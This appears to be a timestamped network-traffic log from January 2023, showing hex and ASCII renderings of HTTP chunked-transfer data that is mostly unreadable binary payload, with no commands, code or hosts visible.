                                                                                                                                                                                    2023-01-05 07:59:18 UTC15921INData Raw: 32 30 30 30 0d 0a 03 86 37 28 9b 12 69 25 f7 2e 75 9f 08 fa a4 44 5a 08 41 85 45 cd ce 09 67 8c 0b 33 45 fb 7b 79 7a 20 b9 08 f3 d9 31 17 91 13 6b 63 aa 1a f2 ce 0b 22 7d 00 b5 c5 78 7f ab a1 40 28 d5 fc a4 89 84 74 4b f7 2f 85 25 4c 62 e3 35 c2 66 ff 45 73 66 b4 66 26 db e7 f1 d1 82 2f a7 c2 cc f9 74 eb 90 fe d0 b3 f7 4b e3 4e d0 27 c8 30 30 73 cc ca b6 60 69 6a a5 bc 72 b8 21 14 84 06 4a 57 b2 f6 15 b3 d8 37 78 ea e3 d8 71 6d 09 a6 e3 74 f3 a8 4c f9 de ea 8e e5 e6 cc 73 86 e7 56 9d 32 89 55 f0 44 97 a7 91 fe b3 73 ce 1f a9 7d 43 af ee 34 d3 96 a0 8a fa 32 f9 99 4d 29 a4 40 37 86 1a 3f 9e 85 8f 2c 77 23 aa ae 11 17 87 be af aa 29 13 28 38 69 05 85 63 9a 66 08 ab 1c 41 b9 78 08 2e d6 e4 5f 93 ea 5b 88 4a b0 de 0a 3e aa a9 ec 0f 40 f2 67 34 5a fc 81 df 23
                                                                                                                                                                                    Data Ascii: 20007(i%.uDZAEg3E{yz 1kc"}x@(tK/%Lb5fEsff&/tKN'00s`ijr!JW7xqmtLsV2UDs}C42M)@7?,w#)(8icfAx._[J>@g4Z#
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15929INData Raw: 84 17 86 e8 33 ad
                                                                                                                                                                                    Data Ascii: 3
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15929INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15929INData Raw: 31 66 66 38 0d 0a 8f a0 ac 67 98 d3 90 e5 c9 0a 97 98 2f 4f 27 ed d3 9d 33 a4 65 26 31 d1 07 b9 b9 1f 7f 79 76 b1 40 f2 ac e0 6f fc 54 27 25 a6 cc 51 de 19 6f c6 05 91 cf ee ed 6e 98 86 bb 09 cf c0 d7 10 55 34 d6 6d 8e 49 5b 63 0c 09 cc 2c f2 3a da 2c ad 62 55 ce ce 80 89 69 34 70 3e 59 b1 2d fc 20 dc b0 b0 7a c2 0a e9 90 0a 0e 60 3d a8 19 83 30 2f 3e 94 c1 e1 96 9d 7d 4e ca b6 97 e9 76 0e d3 41 af 17 c4 f8 48 0a ff 42 c1 d2 b6 ee a6 40 6c 9f 11 35 fa bf b0 75 48 1d eb 51 ce 53 8e 3f 0d 0f ca b9 7f 12 05 9e 7a a9 de 66 3c 4e 44 86 9a 53 6f 44 e0 4e db c3 34 3e be a7 c6 ff 67 90 dc c8 7a df 16 b0 e5 6c 9d 28 54 32 e6 1c f1 0f 7a 59 4f 4d 67 8e c9 0b 78 50 f8 92 b3 0e c4 c6 70 dc 7f ad 09 d0 cf 58 7d ef e3 89 a7 d8 d1 c3 bb 7d 56 67 3a e3 e6 d2 91 f9 bd 65
                                                                                                                                                                                    Data Ascii: 1ff8g/O'3e&1yv@oT'%QonU4mI[c,:,bUi4p>Y- z`=0/>}NvAHB@l5uHQS?zf<NDSoDN4>gzl(T2zYOMgxPpX}}Vg:e
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15937INData Raw: 32 30 30 30 0d 0a
                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15937INData Raw: 93 1b 76 b8 8e 6d 6d 97 17 4d 98 1c 69 99 95 d7 24 db 33 40 b8 9f 46 3e a8 27 d0 f0 51 54 b8 c2 10 bf 5d 6f f9 5a a5 2d a3 96 08 45 d7 c4 47 d7 81 b6 d3 cb ab ee f0 f3 9c e8 fb cd 0c 19 71 39 4e 42 9e 46 12 55 73 50 e8 2b e9 18 d7 e4 48 14 07 4b f3 14 91 63 ac d7 0f 80 dc 12 a3 78 c5 36 14 94 d9 f5 50 7c 0c be d8 17 71 8b 9a 07 4a ba 7a a0 6b e9 53 f1 4b 10 7e 3f 09 49 cf b2 4f 5c 29 60 6e a3 be e6 be e9 0b dc cc b3 de 8b 6f 56 6b a5 80 0d 22 50 1d fb 8b 1f 06 54 2a 42 c2 0b 69 48 46 28 65 67 cd 72 1c 02 c3 eb 9a 6d 5b 8d 57 83 16 07 06 7a 46 f5 1e cf 92 ac de 65 f7 98 61 0b b6 99 8d 4a 63 d8 54 02 05 d6 3c 5e db d2 c3 90 71 06 b1 a1 3d e8 db 55 ee 24 c7 89 c5 97 5b 22 a5 89 2d 70 cf a2 13 a2 60 2f 7d 28 86 91 9d f9 14 1d e7 7a 86 0d d7 f8 63 a5 07 36 3e
                                                                                                                                                                                    Data Ascii: vmmMi$3@F>'QT]oZ-EGq9NBFUsP+HKcx6P|qJzkSK~?IO\)`noVk"PT*BiHF(egrm[WzFeaJcT<^q=U$["-p`/}(zc6>
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15945INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15945INData Raw: 32 30 30 30 0d 0a aa fc 18 82 c3 31 64 2a da 69 02 b2 12 c5 75 c9 fd 16 ff c8 98 e0 6c 12 9d 3b af 1e 9e 38 3d cf f7 58 d2 fe 1c f9 ce 6f f2 2c d7 d7 48 d1 89 8e 21 89 f0 a4 39 83 63 ee ff 90 64 e2 e4 b1 3d ea ee 8b 13 81 e8 86 a2 48 64 e6 8f 26 a0 a0 71 ab e1 c7 8d 4b 3c 46 fb b1 22 56 b3 ae 11 12 3e 05 22 3a cc 8d 00 2b 00 16 eb 60 b1 15 25 06 9b 12 89 85 f5 73 d7 7b 9d 8c c7 7c 08 1c bd a8 5e f0 58 eb f6 c0 99 a7 cd f1 43 5f b9 85 2e 3e 7f 36 30 5d 18 14 3f 62 53 7f 49 d8 c0 35 af 68 f9 b0 cb f7 50 00 96 5b 06 a1 09 d6 25 f2 46 8b 03 7f b8 85 57 b8 86 e4 b9 b2 02 1b ee c4 32 aa be 2c 63 a8 c9 3b 00 68 74 f8 08 35 3f 4a c2 89 78 f2 ad ae fc 34 45 18 88 05 ef a3 53 46 c3 60 c9 e6 7e f3 79 ed 9f 4a 97 c4 3d 12 d2 a5 58 56 7e 90 5d 9c 43 87 9c 0c c8 c2 c7
                                                                                                                                                                                    Data Ascii: 20001d*iul;8=Xo,H!9cd=Hd&qK<F"V>":+`%s{|^XC_.>60]?bSI5hP[%FW2,c;ht5?Jx4ESF`~yJ=XV~]C
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15953INData Raw: 11 6e 13 26 a9 bd
                                                                                                                                                                                    Data Ascii: n&
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15953INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15953INData Raw: 32 30 30 30 0d 0a 17 cb b1 a7 36 48 69 d9 94 6d 97 ec d8 a8 e8 2f b9 16 7b 4a a4 90 08 e4 9b 7f 23 f4 37 51 6b 83 5e c2 1b de e2 20 66 19 7d 34 eb 3d 8c 04 13 fb 7f cd d7 5f a8 e1 d1 77 24 09 a2 80 0a e3 a1 db 6e dc 21 b7 d4 12 ae 5b 46 d1 9f 41 38 24 aa 65 09 6e f9 de 8d 12 b5 e8 30 d6 13 fa 31 41 ca 01 7b b2 72 b3 6f c7 e5 3a a7 c2 06 b2 86 83 6e bf 42 5f 27 96 ea 26 20 83 0e fd 8a 69 35 67 b0 5f e7 e6 c2 ea b7 30 a4 15 d4 a9 90 9e b4 0f 7e b3 a1 80 bc c8 6b 2e cc 0a 5b 71 86 d9 59 e3 d0 5b b1 bd e1 91 0a be 83 36 bb ef 65 bc 63 ee df 1b cf 26 20 05 d0 7d a0 9b 0d 70 95 0e bf cd 85 2d 8a 4f b6 54 03 39 28 c8 ad 69 3b 00 63 ed 3f 77 1e 5a 72 05 5c 90 3e 6a 0a 19 e0 5d 3e 07 78 66 53 68 4b 04 8f 85 0e 4c 91 74 85 ab 75 6d b0 bc 25 ff 45 a5 22 6a 3c 32 c6
                                                                                                                                                                                    Data Ascii: 20006Him/{J#7Qk^ f}4=_w$n![FA8$en01A{ro:nB_'& i5g_0~k.[qY[6ec& }p-OT9(i;c?wZr\>j]>xfShKLtum%E"j<2
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15961INData Raw: 9b 58 88 bc 01 33
                                                                                                                                                                                    Data Ascii: X3
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15961INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15961INData Raw: 32 30 30 30 0d 0a df a3 dc ba 90 28 ef a2 9e 57 d1 03 29 90 81 f3 8c 72 33 f5 88 67 1f 7c 00 8b b8 45 1a 1a 2d 01 8c 5e 82 5c de 85 21 9d e7 cf cf ef b9 92 56 1b 51 d1 2e 4b b6 eb 28 e9 f4 66 7c 7d 0f 83 46 f8 94 65 0b f4 a9 c5 90 a5 7b 9b 58 df d4 55 fd 23 28 e3 22 17 5d af ff 1f 2c 7f c6 1e 24 04 41 dc c3 2b 30 98 37 75 26 56 07 e2 fe a2 f6 2a 86 59 7b f3 a7 bf 4e bf 73 87 c6 f2 ac 92 f8 24 ad 0c d0 3c e6 4a 14 b6 a4 03 36 30 46 72 88 59 d1 02 79 b1 3d 71 ef 70 7f 96 09 be 9c bc a5 79 b1 49 c5 1f ef 07 2f f2 55 90 10 52 bd c9 d4 57 25 53 59 0e 87 02 20 0d d9 ef b6 8b ef ea 46 84 c3 99 4b 1b 38 8d 0b 50 07 cf b5 e4 40 0c 28 57 e5 cf 3a 79 9f 60 84 44 f9 fb a8 72 70 53 39 4f b2 a2 63 85 2e 9b f2 94 78 be 19 3f bc 14 65 2b 0b c0 d2 87 8e 9c 75 0e a6 37 0d
                                                                                                                                                                                    Data Ascii: 2000(W)r3g|E-^\!VQ.K(f|}Fe{XU#("],$A+07u&V*Y{Ns$<J60FrYy=qpyI/URW%SY FK8P@(W:y`DrpS9Oc.x?e+u7
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15969INData Raw: a9 4d 9c 56 be af
                                                                                                                                                                                    Data Ascii: MV
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15969INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15969INData Raw: 32 30 30 30 0d 0a 58 d4 94 7e bf 50 06 f6 90 7d f1 67 86 18 71 79 d4 62 34 c1 22 8b a0 e1 f9 1d c0 20 5a 1c 90 6f c9 eb 1d 41 9d 90 7a d7 70 05 fb 91 83 55 6d e4 97 07 fc b4 92 db 6c 30 77 ef b0 bc d5 36 95 9e 6c 14 47 07 b9 0e 8b 02 99 fe 6a 7d c6 71 f6 6a d0 61 be cf 29 ca 8b 12 2f b8 23 c9 59 ba 4d 39 56 25 08 89 c1 33 1f 09 cd c3 6d 7e 72 ff 19 ce 5e e8 7b 7c b6 27 3d 0a 62 41 f3 e4 8f 66 6d e8 14 ed 43 d8 08 73 31 29 0b 2d a3 46 33 9c a9 43 d1 5e 9f c0 2a 09 87 f9 9d af d5 ed 00 c4 e8 0e 41 d9 f7 56 2b c9 51 8e 70 6c 3d 99 29 7c 6b 5f ab bd a2 9c 8b 42 24 47 fa 4a 89 29 c6 54 08 06 58 15 6b 04 18 80 37 80 b7 52 d1 ae 8e b3 d3 a9 91 b1 3a 84 d8 41 7d db 48 84 6d bc 58 8c 85 f5 20 e4 ce 49 2a d5 14 36 63 2c 60 46 56 d0 cc a9 e4 8c c5 00 a9 72 ac b1 6c
                                                                                                                                                                                    Data Ascii: 2000X~P}gqyb4" ZoAzpUml0w6lGj}qja)/#YM9V%3m~r^{|'=bAfmCs1)-F3C^*AV+Qpl=)|k_B$GJ)TXk7R:A}HmX I*6c,`FVrl
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15977INData Raw: 0e a5 41 9b 16 c5
                                                                                                                                                                                    Data Ascii: A
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15977INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15977INData Raw: 32 30 30 30 0d 0a 3c bf 57 96 d7 83 83 af 12 a0 01 bf 63 2e 27 c5 4a e7 29 17 2b 42 77 24 11 59 d1 7a 8b a4 99 a7 c0 ef 17 3a 80 4b 20 41 3e c4 8e e8 3b 85 6d 15 1d 66 b0 51 09 68 35 70 43 4a 89 6f 9a df 12 54 9c 14 90 8f 31 44 81 a1 8d c6 b3 43 57 ca 50 c3 b9 4d 63 94 75 ad d3 7f bb d7 0c 0b 91 af 8f 4a 3e 77 fc 0a 1b a0 d8 df f3 59 e3 3b f7 51 c9 5f 4d 1e b9 51 57 82 61 0a 9d 46 0c f5 e3 18 b0 11 c7 bd 89 0e 56 d2 08 bc b1 df ae 03 d7 3d f2 a1 98 4c e3 c6 94 3a 33 79 a0 d0 9c 79 7e c0 d7 4c c6 d1 52 bb 3d 4d 6b 01 27 bd d6 f2 02 fb b1 59 d4 c5 a8 21 e5 75 18 dc ae 67 ab 2a e9 c1 e9 f7 d6 36 f1 05 e9 82 48 c8 c8 cf 00 cf ed 1f 0b f5 e6 53 02 ee 2c ab 89 38 e3 c1 cb b3 9e e6 b5 d3 b3 11 0d 9a 91 d3 c3 e2 a0 b1 9a 41 f2 f6 98 bd c5 f6 ca fb 4a c9 a8 c6 86
                                                                                                                                                                                    Data Ascii: 2000<Wc.'J)+Bw$Yz:K A>;mfQh5pCJoT1DCWPMcuJ>wY;Q_MQWaFV=L:3yy~LR=Mk'Y!ug*6HS,8AJ
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15985INData Raw: 41 0a 06 88 c6 df
                                                                                                                                                                                    Data Ascii: A
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15985INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15985INData Raw: 32 30 30 30 0d 0a f0 02 ef 2c 0c a7 54 34 cb 74 dd e9 73 d8 ad 10 64 27 00 21 78 bd 87 e9 c8 1e 77 61 d0 e3 77 f5 b0 2c a9 87 99 de 53 db 56 b9 86 cd 54 0b de d9 cd be 93 1a 42 63 42 b4 6e 13 90 3e 0e 05 4e 1c 13 3c 4e 53 6c d5 a7 2e 8d 93 00 c0 20 12 fe ee 89 71 0f 8c 79 5c 94 c0 8e 60 e2 83 f7 2a 39 7e 12 ed 70 a9 91 0b 16 5c 41 1d 9e 0e 42 73 f3 73 00 dd 94 cb 59 9a fc fd 06 69 ca b4 4b 08 ea 23 f1 38 0d 6a 71 6c 6a b7 fc 18 7d 81 19 8d a8 0d b7 34 06 e4 d2 d4 bf 9b 25 ed 17 72 9a 4b 8d 53 3b 1a e8 bf a2 db 26 48 0a 80 79 56 81 99 d0 18 bc c8 28 7a 10 89 0f 95 cb 26 a1 11 25 c0 a1 fd 70 20 f7 e3 e9 38 cd b2 c1 35 a5 27 29 3c 5e 24 c9 b1 47 f4 f9 36 33 0a b5 59 ff 79 1f 6f fb f5 f5 cc 9c 86 7a 94 39 59 a3 42 82 c6 53 a4 c6 fb 0e 5c 92 bf 3c dd 7f 13 39
                                                                                                                                                                                    Data Ascii: 2000,T4tsd'!xwaw,SVTBcBn>N<NSl. qy\`*9~p\ABssYiK#8jqlj}4%rKS;&HyV(z&%p 85')<^$G63Yyoz9YBS\<9
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15993INData Raw: d1 c4 eb e7 f1 fb
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15993INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC15993INData Raw: 31 66 66 38 0d 0a 79 b0 4d ab 2d 17 f1 43 43 4d 1e 55 6b 11 bd 71 19 b3 d4 42 97 0c 64 59 e5 9a 3b 54 de 93 25 22 44 fe 2a 29 ab 28 70 7b 06 58 09 8a be 67 2d ec dd 0d 61 d1 47 5e 89 3b 5f e6 44 95 ed 54 59 93 1b ac 14 77 c3 6e 38 69 cf d0 37 df d2 42 7d 7f 03 79 a4 1b 5f 70 78 99 fe b1 a2 79 f3 ea 2d f6 33 44 c4 93 01 d8 c5 a4 0e 00 ba 7c 5d 1b a6 09 bf 73 36 0d e5 de 9e 55 f6 0b 8f f0 cb f4 03 ab be ae a1 69 f8 cf 50 b1 36 64 cf a9 ab 19 a7 d2 62 19 e3 1c 4a ae 4b 15 83 04 cb 02 86 c1 74 cc d6 4c cb fa 65 f5 bf 55 71 4d 4f 04 f6 29 d4 15 7a 9d 8d 09 a7 2e 17 bb 50 bd 80 db 9b bd 6e 8a 6a 57 46 36 e7 43 f8 bb a1 3a 3d 5e 2e 01 5f 84 fc cb 60 ab 34 b7 a8 c8 8f 31 7d a7 46 03 fb fc 89 e7 ed 35 f1 7d 47 1a 4d 22 5f a1 f5 4f c2 2b 1c 1f d1 3d 61 e0 65 a6 d8
                                                                                                                                                                                    Data Ascii: 1ff8yM-CCMUkqBdY;T%"D*)(p{Xg-aG^;_DTYwn8i7B}y_pxy-3D|]s6UiP6dbJKtLeUqMO)z.PnjWF6C:=^._`41}F5}GM"_O+=ae
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16001INData Raw: 32 30 30 30 0d 0a
                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16001INData Raw: 9c 5c 9a 73 d5 05 28 8a a9 9e 5c 1e b7 b8 0e 3b 27 1e 57 ee 84 02 cb 5a 23 f5 93 20 62 a9 27 cb a9 d3 a3 8d f0 86 fe 42 27 e9 f9 09 7c 54 81 12 72 12 c8 83 73 4a 82 53 a0 e1 f5 85 02 4c 46 ec d1 21 e6 e1 de 03 71 c7 b6 0d 2c 36 02 f1 9d cd c1 b7 f2 c1 68 3d 3f 9d 6e d7 0d 3f 72 53 dd a4 0c c5 05 61 6a a1 77 e2 6a 4c 12 bf f2 d9 d1 a4 79 da be 6f 13 42 a1 9f 9c e9 ff dc 5f 57 4d 45 3d 3f 24 be 45 5e 35 b3 fe 8a 80 7a ba 84 9f b3 d9 4a 2c 0b 75 2b fa 58 7b 29 8a d4 e6 12 13 80 f2 38 ea d6 24 83 49 bf 31 56 d4 1b 28 e1 b4 5b ea 6a e8 1d 37 75 ac df c1 de ee 95 1b 4f ed ec b0 89 95 44 1a 80 0e 66 e7 55 9b fc 65 43 48 e7 f2 e4 4e c6 c6 6d 05 8f 98 8a 0b d9 bf 8a ad ab b5 bb b8 6e 17 79 10 f3 fc b6 ea 23 ff 6c 01 8a 62 c2 e7 83 71 6f ec f7 ec 29 8b 15 b5 62 8c
                                                                                                                                                                                    Data Ascii: \s(\;'WZ# b'B'|TrsJSLF!q,6h=?n?rSajwjLyoB_WME=?$E^5zJ,u+X{)8$I1V([j7uODfUeCHNmny#lbqo)b
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16009INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16009INData Raw: 32 30 30 30 0d 0a 27 c5 ec 7d 16 1c ea 31 48 22 69 d4 f9 20 23 59 7b 79 8d 7f 34 66 ff 98 a9 99 e1 0e 9c 09 46 8b f0 13 c2 8e 3b 7f 67 5c 0d 63 cf 0b b6 67 de 6a a3 c7 37 cd ca b8 20 01 d2 39 3d 24 1a 25 8d 8f 7c d2 db 6f 0a 19 2c 90 6a b3 81 f2 f9 19 bb 41 2a 8f 1e 4e 82 7a a8 34 c7 09 bc ab e4 4b 5d d7 e6 83 3a cc 40 13 ff 65 ed 37 15 65 5f f2 f9 01 ca d3 96 56 54 cd 62 db 25 a7 86 07 ce ab f9 46 e8 ec de 8f 66 dd 6f 5a cb 62 7a 05 08 a0 5e 65 b3 95 a1 87 19 a4 12 09 8c 4e a6 87 72 d6 9a 7f a7 bf 7f 2d 75 1e 2d f9 ad 19 cd 31 a5 99 f4 79 ea 5d 9b d3 81 c6 7f 97 9c 65 3d b4 18 3b ba 48 fd 4c be 91 58 e6 6e 4a 58 e0 9e ad 1b b9 5c d5 32 45 f0 7b fc fe a2 5f 06 be 65 64 89 bb 45 3d 19 2c f4 96 e6 10 f0 42 d2 39 6c 62 f0 8d 7f d1 74 d4 36 25 04 11 69 d4 0f
                                                                                                                                                                                    Data Ascii: 2000'}1H"i #Y{y4fF;g\cgj7 9=$%|o,jA*Nz4K]:@e7e_VTb%FfoZbz^eNr-u-1y]e=;HLXnJX\2E{_edE=,B9lbt6%i
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16017INData Raw: f7 0d 8d 54 ef de
                                                                                                                                                                                    Data Ascii: T
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16017INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16017INData Raw: 32 30 30 30 0d 0a d3 fe cb 9e ae 52 f8 5e 55 80 4c 89 bd 49 e7 ca 2f 09 9d 2a 3e 54 a3 3e d0 61 55 d6 08 96 ab b3 8c fe 4f a9 eb 62 39 e0 22 cf 50 d4 c7 43 0f 95 45 a0 d7 d4 ed a0 5b 1c a1 d3 73 df f5 1b cd c9 d9 aa 51 88 ba 80 c2 45 63 d9 ba 22 0a 44 a0 d6 8f 4a 42 9c 13 1e 40 aa 4e 08 15 08 53 b3 21 27 1d 3c 74 e4 0b 30 0c 72 5b 01 a0 8a 6d ef cf 0b 77 c1 fc 45 da 17 7b ee 92 b7 41 48 ad 46 ec 6e 40 f0 02 ec 7e 75 e0 de c2 d9 58 f9 da e2 e4 b5 7e ff a5 fd 87 39 65 89 2f a0 6d c6 df 30 f9 97 e6 cf aa f7 90 eb 08 a9 b0 76 d8 cc 28 90 0a ae 27 b5 64 ae 06 ae d5 63 fd 0b 71 30 a2 d5 9e 6e 24 39 48 90 4b a4 f0 13 1d e5 e8 4b 0f e9 d2 ba db 98 b4 ea ab 1f ae 94 d8 a5 74 fd 41 8f 78 a6 d8 74 19 1a 39 ca d0 7d d3 96 2e 28 f6 bf 40 83 8d 3f f2 00 72 2d 8e 2b 82
                                                                                                                                                                                    Data Ascii: 2000R^ULI/*>T>aUOb9"PCE[sQEc"DJB@NS!'<t0r[mwE{AHFn@~uX~9e/m0v('dcq0n$9HKKtAxt9}.(@?r-+
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16025INData Raw: 37 81 64 9a 9b 30
                                                                                                                                                                                    Data Ascii: 7d0
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16025INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16025INData Raw: 32 30 30 30 0d 0a eb 66 ad 41 bf b0 d1 60 30 b6 d1 2c ed 89 67 bf bf 4e 1f 87 2b aa d0 16 51 e9 a4 3a 19 89 e5 5b fe d3 65 25 fa 26 de ba 68 35 0e fb 70 df ab e3 ce c4 4d 2f e0 bc ed e0 0f ae 1f 10 95 b0 b9 44 fe d2 13 03 00 e0 c0 82 7e 35 11 ba 98 76 5b 1e 4c ae c8 5a 17 01 a4 1d 00 81 4c bd 3e 3d 6a 7d f1 2f c8 a2 06 21 70 4a 79 f0 a3 de 04 e3 9b b6 18 0b 32 0d 40 5d d5 ce 46 55 1f a8 e4 68 4f 3a 48 70 1c c2 43 db 37 09 75 0a 03 ff d6 68 04 0c 3b 51 bc b7 b3 b2 25 74 1c cc 4f 96 a6 07 1b d9 6b 70 56 67 08 24 64 57 e3 0a 4d 04 e2 9f b6 fd 1e 14 fb 2e 3c 2e ba 30 83 73 82 a2 1f 85 bb e7 ce 8e d3 32 8c 01 9f 2f 12 79 ff 93 90 e2 4b bd 59 56 80 62 7c 84 19 dd df 02 30 8c f9 39 0a cf 28 74 0f f9 f0 16 bd 0d 68 aa 20 8f e7 4f 03 2a b8 c9 d4 2a 23 34 b9 17 6f
                                                                                                                                                                                    Data Ascii: 2000fA`0,gN+Q:[e%&h5pM/D~5v[LZL>=j}/!pJy2@]FUhO:HpC7uh;Q%tOkpVg$dWM.<.0s2/yKYVb|09(th O**#4o
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16033INData Raw: 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16033INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16033INData Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 00 00 00 00 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16041INData Raw: 7e 00 80 84 8a 00
                                                                                                                                                                                    Data Ascii: ~
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16041INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16041INData Raw: 32 30 30 30 0d 0a 8c 7f 7f 00 80 80 5b 00 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 1d f0 df d6 d6 d6 d6 ea 82 d6 d6 d6 d6 d6 d6 d6 d6 6c e7 d4 9c 21 e6 39 26 d6 d6 d6 d6 d6 d6 d6 d6 6d 7e 7e e2 7e 7e 39 0c d6 d6 d6 d6 d6 d6 d6 d6 82 76 3b 3b 3b 3b e9 a4 d6 d6 d6 d6 d6 d6 d6 d6 ea c2 c2 c2 c2 cb cb df d6 d6 d6 d6 d6 d6 d6 6c 07 24 24 24 24 24 24 07 09 d6 d6 d6 d6 d6 c1 fd dc dc dc dc dc dc dc 39 e7 df d6 d6 d6 3e df c1 c1 fd 16 7d 7d 7d 16 fd 3d df bb d6 d6 d6 d6 d6 d6 9c fd 1b 7d ea 43 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 0c 1b 01 1d d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 9c 07 df d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 82 9c d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 d6 43 d6 d6 d6 d6 d6 d6 d6 d6 d6
                                                                                                                                                                                    Data Ascii: 2000[l!9&m~~~~9v;;;;l$$$$$$9>}}}=}CC
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16049INData Raw: 83 ae b1 b1 b1 b1
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16049INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16049INData Raw: 32 30 30 30 0d 0a b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 29 83 83 83 29 ae d0 a0 68 68 c7 8a 60 63 25 d9 84 d6 3c d6 3c 95 8a 8b a0 42 42 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 91 56 42 83 83 83 83 83 68 60 52 09 67 b9 25 d9 25 7c 8a 8a 82 83 29 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 83 68 60 02 ff 7d 2e d3 7d 1d 60 c9 76 83 12 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 83 68 60 c5 24 ff ff 8c 8a 60 b3 42 83 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 83 68 60 ce 4a 4a 52 60 60 91 83 8e b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1 b1
                                                                                                                                                                                    Data Ascii: 2000))hh`c%<<BBVBh`Rg%%|)h`}.}`vh`$`Bh`JJR``
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16057INData Raw: 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16057INData Raw: 0d 0a
